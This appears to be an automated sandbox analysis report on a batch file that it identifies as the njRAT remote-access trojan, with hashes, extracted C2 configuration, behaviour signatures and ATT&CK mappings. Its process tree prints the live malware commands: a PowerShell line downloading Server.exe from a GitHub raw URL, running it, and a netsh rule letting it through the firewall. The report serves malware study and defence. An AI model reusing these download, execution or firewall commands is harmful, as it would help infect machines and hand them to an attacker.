Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-01-2025 22:34
Static task
static1
Behavioral task
behavioral1
Sample
DisableWDv1.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
DisableWDv1.bat
Resource
win11-20241007-en
General
-
Target
DisableWDv1.bat
-
Size
664B
-
MD5
d5ae652c3c0c4ed6269743dbfb5ce953
-
SHA1
43a8888f001b9b7e2629746848f2a1601acb60f2
-
SHA256
bc29f3e495e73cab8b5cc4b63d0048109fe3f33f3d209939a279053d4091448e
-
SHA512
2d05a38a154adfba0b2e6d0ff38a6c3e21b6f0ec840f5618bee6b06836aef255cf98d4ad578cedf4a49955fa1cb0c4d3255c028a47fd83dcc6af1e20b62e9499
Malware Config
Extracted
https://raw.githubusercontent.com/pebiko70/test/main/Server.exe
Extracted
njrat
im523
HacKed
financial-amanda.gl.at.ply.gg:47287
023b6c1e71ec3df384e0804152feb1fe
-
reg_key
023b6c1e71ec3df384e0804152feb1fe
-
splitter
|'|'|
Signatures
-
Njrat family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 3600 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3488 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation Server.exe -
Executes dropped EXE 2 IoCs
pid Process 1048 Server.exe 1708 server.exe -
pid Process 3600 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 raw.githubusercontent.com 7 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3600 powershell.exe 3600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeDebugPrivilege 3600 powershell.exe Token: SeDebugPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe Token: 33 1708 server.exe Token: SeIncBasePriorityPrivilege 1708 server.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 5064 wrote to memory of 640 5064 cmd.exe 84 PID 5064 wrote to memory of 640 5064 cmd.exe 84 PID 640 wrote to memory of 2528 640 net.exe 85 PID 640 wrote to memory of 2528 640 net.exe 85 PID 5064 wrote to memory of 3600 5064 cmd.exe 86 PID 5064 wrote to memory of 3600 5064 cmd.exe 86 PID 5064 wrote to memory of 1048 5064 cmd.exe 87 PID 5064 wrote to memory of 1048 5064 cmd.exe 87 PID 5064 wrote to memory of 1048 5064 cmd.exe 87 PID 1048 wrote to memory of 1708 1048 Server.exe 89 PID 1048 wrote to memory of 1708 1048 Server.exe 89 PID 1048 wrote to memory of 1708 1048 Server.exe 89 PID 1708 wrote to memory of 3488 1708 server.exe 97 PID 1708 wrote to memory of 3488 1708 server.exe 97 PID 1708 wrote to memory of 3488 1708 server.exe 97
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DisableWDv1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2528
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pebiko70/test/main/Server.exe', 'C:\Users\Admin\AppData\Local\Temp\Server.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3488
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
319B
MD5da4fafeffe21b7cb3a8c170ca7911976
SHA150ef77e2451ab60f93f4db88325b897d215be5ad
SHA2567341a4a13e81cbb5b7f39ec47bb45f84836b08b8d8e3ea231d2c7dad982094f7
SHA5120bc24b69460f31a0ebc0628b99908d818ee85feb7e4b663271d9375b30cced0cd55a0bbf8edff1281a4c886ddf4476ffc989c283069cdcb1235ffcb265580fc6
-
Filesize
37KB
MD54e183a4e5f7aab910c7dafb866445339
SHA1e71b14cb3a391ab84badc8df27aad7d5f2e226df
SHA2567a196f271f282e3d8abb7fb4f72f10c77204fd183fdaa3dd6cb38fa36c42612f
SHA512318b0ec1b8708a4247ea203a2640fa15b81a036d7a61609d1ebb4ef383bcc7f900679fdd0c37f6b08719eee8aec35f55b5cc9124981c849702ab4e015ac4c00c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82